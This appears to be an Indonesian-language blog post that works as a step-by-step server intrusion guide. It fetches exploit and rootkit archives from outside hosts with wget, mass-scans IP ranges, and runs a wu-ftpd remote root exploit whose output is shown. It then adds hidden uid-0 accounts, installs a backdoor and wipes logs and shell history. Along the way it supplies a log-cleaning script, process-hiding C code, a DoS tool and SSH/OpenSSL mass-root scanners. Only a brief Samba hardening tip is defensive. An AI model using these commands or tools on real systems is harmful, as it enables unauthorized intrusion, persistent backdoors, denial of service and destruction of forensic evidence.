Cracking Root
=======================================================
Tips:
mkdir .bash <----untuk membuat direktori bash
cd .bash <---untuk masuk ke direktori bash
mkdir <direktory> <--- untuk membuat direktory baru
cd <direktory> <--- untuk masuk ke direktory yg anda mau
cd / <--- untuk keluar dari suatu direktory
rm -rf <file> <--- untuk menghapus file/direktory
1. Tahap Pertama
Cara instalasi Xpost dan ftp
wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf ftp.tgz
======================================================
2. Tahap Kedua
cd xpost
cd xwurm/
./scan 213.124
setelah dapat wu-scan.log
./masswu wu-scan.log
Setelah didapat pesan sebagai berikut
Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...
Itu berarti anda telah dapat akses root di IP 213.124.151.113
======================================================
3. Tahap Ketiga
Buka new sessiom dari putty ssh anda, login kembali ke shell anda
masuk ke direktory ftp anda
cd ftp
./awu 213.124.151.113 ( ip nya)
apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb:
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner
### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
############################################################################
uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
whoami
root <-- berarti anda sedang dalam akses root
======================================================
4. Tahap Keempat
Add login akses root anda
--------------------------------------------------------------
1. Cara I (bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /
passwd -d rampok
passwd rampok
su rampok <<--------untuk super user
2. Cara II
kalo mau dapet acces root ketik :
/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
abis itu ketik lagi
passwd crit
wuasu666
Kemudian Add User untuk login shell anda
/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X
=======================================================
5. Tahap Kelima
Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan
wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup pass yang dimau port yang dimau
contoh : --> ./setup wuasu 7000
cd /
wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install
Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak
rm -rf cleaner.tgz
rm -rf shv4.tar.gz
===========================================
6. Tahap Keenam
Hapus jejak ngeroot anda ketik perintah berikut:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d
SELESAI.....
============================================================
Satu tips buat menghacurkan shell anda yang rusak ato sudah dihapus password loginnya
oleh admin, dengan catatan anda masih berada dalam shell itu juga, yaitu:
wget http://cyberborneo.b0x.com/xzibit.tar.gz
tar -zxvf xzibit.tar.gz
cd lamerk
./install
cd /
rm -rf lamerk xzibit.tar.gz
============================================================
Beberapa Link Yang bagus buat program2 eksploit, DDOS, Sniffing, Security Tools etc....
http://www.angelfire.com/de2/sirex3/linux.html
http://www.megspace.com/internet/wet/linux.html
http://www.s0ftpj.org/en/tools.html
http://web.textfiles.com/hacking/
http://www.honeynet.org/scans/
http://www.honeynet.org/scans/scan15/som/som30.txt
http://www.yolinux.com/TUTORIALS/LinuxSecurityTools.html
http://www.attrition.org/mirror/attrition/2000-07.html/
http://www.sans.org/rr/infowar/hacktivism2.php
http://www.antihackertoolkit.com/tools.html
http://www.hackinglinux.co.uk/
http://www.virtro.de/now_inhalt.html
http://packetstormsecurity.nl/misc.html
http://www.ariska.net/
http://www.valisie.com/Vali/
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
obat tembak.c >>echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
# Disables packet forwarding
net.ipv4.ip_forward = 0
# Enables source route verification
net.ipv4.conf.all.rp_filter = 1
# Disables automatic defragmentation (needed for masquerading, LVS)
net.ipv4.ip_always_defrag = 1
# Disables the magic-sysrq key
kernel.sysrq = 0
you can get sample for "blockping.tar.gz" just extract and move them to /usr/bin/
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
***Jalanin Tembak.c***
./fake bash ./tembak zipey.net 53 (Pake Hidder tanpa Login Root)
./tembak ipaddress 53 atau ./tembak zipey.com 53
./tembak zipey.com 53 -->> artinya nembak zipey.com lewat port 53
(ditembak port 53 nya pasti mati)
./fake proses_asli proses_palsu
./fake httpd ./teso -h 202.202.202.202
./fake -bash ./bnc bnc.conf
./fake pico ./eggdrop -m FroGStoNe
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* Fake Background Buatan buDZ
Greetz to : fabianclone,EF73 and all #betalmostdone and #antihackerlink
/* [ilang.c] File Paling Oke Untuk Menghilangkan BackGround unTuk Eggdrop Dan BnC. [http://members.tripod.com/alltoolkit] woRdz: d0n't cHangE beL0w thIs liNe , pRivatE stfU CrEatEd bY buDZ <mYnAmE@bOeDi.NeT> */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
char fake[1000]; int main(int argc,char **argv) { if(argc < 3) { exit(0); }
strcpy(fake,argv[1]);strcat(fake,
" "
" "
" ");
execl(argv[2],fake,argv[3],argv[4],argv[5],argv[6],argv[7],argv[8],NULL);
exit(0);}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
***Hide BG procces***
gcc -o namafile undo1.c
chmod +x namafile
./undo httpd ./eggdrop -m eggdrop.conf
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
***Wipe Login User***
(ngejalaninnya pake login Root)
upload wipe ke dir-user
chmod +x wipe
./wipe u username
./wipe l username
./wipe w username
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#!/bin/sh
clear
echo "log CLEANING SERVICE - rahul-x"
echo " "
echo "bersih... bersih... "
echo "Removing Files....."
echo " "
rm -f ~root/.bash_history
rm -f /var/log/lastlog
rm -f /var/log/netconf.log
rm -f /var/log/boot.log
rm -f /var/log/messages
rm -f /var/log/secure
rm -f /var/log/xferlog
echo "Creating Files......"
echo " "
touch ~root/.bash_history
touch /var/log/lastlog
touch /var/log/netconf.log
touch /var/log/boot.log
touch /var/log/messages
touch /var/log/secure
touch /var/log/xferlog
echo "Change Mode Files..."
echo " "
chmod 0664 ~root/.bash_history
chmod 0664 /var/log/lastlog
chmod 0664 /var/log/netconf.log
chmod 0664 /var/log/boot.log
chmod 0664 /var/log/messages
chmod 0664 /var/log/secure
chmod 0664 /var/log/xferlog
echo " "
echo "riped riped riped by rahul-x : ... "
echo " viva indonesia "
echo " "
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Menutup hole pada samba terhadap serangan sambal.c
Untuk mengatasi hal tersebut, ada satu teknik yang sangat gampang. Yaitu dengan melakukan editing pada file smb.conf
Anda cukup mencari bagian
----------------
[netlogon]
comment = Network Logon Service
path = /usr/local/samba/lib/netlogon
guest ok = yes
writable = no
share modes = no
----------------
Terus ubah bagian guest ok = yes menjadi guest ok = no
Selanjutnya matikan samba nya dengan command /etc/init.d/smb stop untuk menon-aktifkan configurasi samba yang aktif.
Kemudian hidupkan kembali dengan commmand /etc/init.d/smb start untuk menjalankan configurasi yang baru.
Dengan melakukan perubahan tersebut, coba anda lakukan exploitasi lagi
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
cat /etc/passwd
copy-paste ke notepad
cari yg ada akhiran bash <<= bisa di jadikan root lagi
liat yg ada numeric => :x::255::255:
ganti yg di tangah jadi 0
trus you ingatin user nya yg kamu ganti jadi 0 itu apa
cat > /etc/passwd
enter
trus paste lagi
trus tekan control D
trus tekan control c
liat berhasil ga berubah ga 255 itu jadi 0
passwd user <<= ingat tadi apa nama user yg kamu ganti 255 nya jadi 0
trus klo udah login su
langsung ke cd /lib/security
bikin direkc pam_res.so
cd pam_res.so
wget cleaner disana
dalam pam_res.so
ga boleh selain root
harus you ganti usernya name nya jadi root
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
openBSD:
wget http://packetstorm.decepticons.org/crypt/ssh/openssh/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.4p1.tar.gz
wget www.renjana.com/sshutup-theo.tar.gz
tar -zxvf sshutup-theo.tar.gz
ls -al sshutuptheo
cd openssh-3.4p1
patch < ssh.diff
./configure
make ssh
./ssh -l root IP co: ./ssh -l root shah.koptevo.net
http://www.netcraft.com/whats/?host=www.t-mems.com.tw
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ngeROOT ssh LINUX port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <--- scan massal SSH
./r00t 203.20 -d 2 <--- scan massal FTP
./r00t 203.20 -d 3 <--- scan massal FTP
./r00t 134.7. -d 4
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ngROOT pake massaphace:
./massossl 200 443 160
artinya
scan ip 200.160
port 443
port 443 jangan diganti, kecuali ip boleh
dari ip 1 - 254
kecuali ip 192.x.x.x lawan 10.x.x.x kada kawa discan, soalnya ip intranet
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tuesday, January 28, 2014
Cracking Root
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment